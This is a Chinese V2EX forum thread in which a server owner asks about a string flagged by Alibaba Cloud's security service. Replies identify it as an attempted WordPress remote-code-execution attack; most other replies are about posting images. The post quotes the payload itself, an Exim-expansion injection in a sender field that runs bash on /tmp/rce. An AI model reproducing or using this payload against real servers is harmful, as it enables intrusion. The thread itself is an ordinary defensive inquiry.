这是一个创建于 2729 天前的主题,其中的信息可能已经有所发展或是发生改变。
https://ooo.0o0.ooo/2017/05/31/592e5c3e9df87.png 阿里云的云盾,这串玩意儿是干啥 target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce}} null)
这里不应该是我服务器的 ip 或者域名吗
16 条回复 • 2017-06-01 00:21:11 +08:00
 |
1
voocel OP https://ooo.0o0.ooo/2017/05/31/592e5c3e9df87.png
|
|
2
voocel OP 
|
|
3
voocel OP <img src="https://ooo.0o0.ooo/2017/05/31/592e5e65eebd5.png" alt="QQ 截图 20170531135932.png" title="QQ 截图 20170531135932.png" />
|
|
4
voocel OP 发个图片,真难!
|
 |
5
t333st 2017-05-31 14:38:23 +08:00
尝试进行远程命令执行,可能攻击者的程序 变量没替换成功就发起了请求
|
 |
6
lisonfan 2017-05-31 14:39:22 +08:00
发帖用 markdown 回帖直接贴链接
|
 |
10
laoyur 2017-05-31 15:42:04 +08:00
@lisonfan #8 你是不是装什么黑科技插件了,没有显示出来诶
v2 的正文支持 markdown,回复不支持,但回复支持 url 贴图,不过又仅支持部分 sinaimg 和 imgur …… |
|
12
lisonfan 2017-05-31 15:44:49 +08:00
但是我用 Chrome 匿名模式也看着是一个链接,难道是 https://chrome.google.com/webstore/detail/v2ex-plus/daeclijmnojoemooblcbfeeceopnkolo 这个插件的功劳?
|
 |
13
Devmingwang 2017-05-31 22:20:28 +08:00 via Android
|
|
14
Devmingwang 2017-05-31 22:22:19 +08:00 via Android
哦,括号没用英文。。。
|
 |
15
ic3z 2017-05-31 22:59:52 +08:00 via Android  1
wordpress 的一个 rce
http://www.freebuf.com/vuls/133849.html |
Select Language